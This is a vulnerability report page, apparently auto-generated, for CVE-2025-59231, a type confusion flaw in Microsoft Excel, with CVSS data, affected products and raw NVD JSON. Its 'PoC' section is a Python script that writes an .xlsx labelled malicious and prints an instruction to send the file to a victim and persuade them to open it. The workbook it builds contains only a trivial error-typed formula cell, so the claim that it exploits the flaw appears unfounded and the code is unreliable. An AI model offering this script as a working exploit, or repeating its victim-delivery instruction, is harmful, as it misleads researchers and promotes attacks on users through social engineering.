Security Vulnerability Report
中文
CVE-2025-59231 CVSS 7.8 HIGH

CVE-2025-59231

Published: 2025-10-14 17:16:04
Last Modified: 2025-10-28 20:29:40
Source: [email protected]

Description

Access of resource using incompatible type ('type confusion') in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x64:* - VULNERABLE
cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x86:* - VULNERABLE
cpe:2.3:a:microsoft:excel:2016:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:a:microsoft:excel:2016:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:a:microsoft:office:2019:*:*:*:*:*:x64:* - VULNERABLE
Microsoft Office Excel 2016
Microsoft Office Excel 2019
Microsoft Office Excel 2021
Microsoft 365 Apps for Enterprise(受影响版本)
Microsoft Office LTSC 2024(受影响版本)
Microsoft Office for Mac(受影响版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59231 - Microsoft Office Excel Type Confusion PoC # This PoC demonstrates the concept of exploiting a type confusion vulnerability in Excel # Note: Actual exploitation requires a specifically crafted binary Excel file import struct import zipfile import os import shutil def create_malicious_excel(output_path): """ Create a malicious Excel file that triggers type confusion vulnerability. The file is a minimal .xlsx (Office Open XML) archive with manipulated internal structures to cause type confusion during parsing. """ # Create temporary directory for Excel contents temp_dir = "temp_excel" if os.path.exists(temp_dir): shutil.rmtree(temp_dir) os.makedirs(temp_dir) # Create minimal Excel file structure os.makedirs(f"{temp_dir}/_rels") os.makedirs(f"{temp_dir}/xl") os.makedirs(f"{temp_dir}/xl/worksheets") # Content Types XML content_types = '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"> <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/> <Default Extension="xml" ContentType="application/xml"/> <Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/> <Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/> </Types>''' with open(f"{temp_dir}/[Content_Types].xml", "w") as f: f.write(content_types) # Relationships rels = '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/> </Relationships>''' with open(f"{temp_dir}/_rels/.rels", "w") as f: f.write(rels) # Workbook XML with manipulated cell types to trigger type confusion workbook = '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"> <sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets> </workbook>''' with open(f"{temp_dir}/xl/workbook.xml", "w") as f: f.write(workbook) # Worksheet with type-confused cell data # The cell type is set to 'e' (error) but contains formula-like data # This mismatch triggers the type confusion vulnerability sheet = '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"> <sheetData> <row r="1"> <c r="A1" t="e"><f>SUM(B1:B10)</f><v>#REF!</v></c> <c r="B1" t="str"><v>AAAA</v></c> </row> </sheetData> </worksheet>''' with open(f"{temp_dir}/xl/worksheets/sheet1.xml", "w") as f: f.write(sheet) # Package into .xlsx file with zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED) as zf: for root, dirs, files in os.walk(temp_dir): for file in files: file_path = os.path.join(root, file) arcname = os.path.relpath(file_path, temp_dir) zf.write(file_path, arcname) # Cleanup shutil.rmtree(temp_dir) print(f"Malicious Excel file created: {output_path}") print("Send this file to victim and convince them to open it with Excel.") if __name__ == "__main__": create_malicious_excel("CVE-2025-59231_poc.xlsx")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59231", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:16:04.390", "lastModified": "2025-10-28T20:29:40.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Access of resource using incompatible type ('type confusion') in Microsoft Office Excel allows an unauthorized attacker to execute code locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x64:*", "matchCriteriaId": "3259EBFE-AE2D-48B8-BE9A-E22BBDB31378"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x86:*", "matchCriteriaId": "CD25F492-9272-4836-832C-8439EBE64CCF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:excel:2016:*:*:*:*:*:x64:*", "matchCriteriaId": "CD88F667-6773-4DB7-B6C3-9C7B769C0808"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:excel:2016:*:*:*:*:*:x86:*", "matchCriteriaId": "B342EF98-B414-44D0-BAFB-FCA24294EECE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:*:x64:*", "matchCriteriaId": "CF5DDD09-902E-4881-98D0-CB896333B4AA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:*:x86:*", "matchCriteriaId": "26A3B226-5D7C-4556-9350-5222DC8EFC2C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:-:x64:*", "matchCriteriaId": "851BAC4E-9965-4F40-9A6C-B73D9004F4C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:-:x86:*", "matchCriteriaId": "23B2FA23-76F4-4D83-A718-B8D04D7EA37B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:macos:*:*", "matchCriteriaId": "BF0E8112-5B6F-4E55-8E40-38ADCF6FC654"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2024:*:*:*:*:-:x64:*", "matchCriteriaId": "D31E509A-0B2E-4B41-88C4-0099E800AFE6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2024:*:*:*:*:-:x86:*", "matchCriteriaId": "017A7041-BEF1-4E4E-AC8A-EFC6AFEB01FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2024:*:*:*:*:macos:*:*", "matchCriteriaId": "EF3E56B5-E6A6-4061-9380-D421E52B9199"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_online_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.0.10417.20059", "matchCriteriaId": "94C948A2-EAF1-4471-81BD-38E5F4A92F72"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59231", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.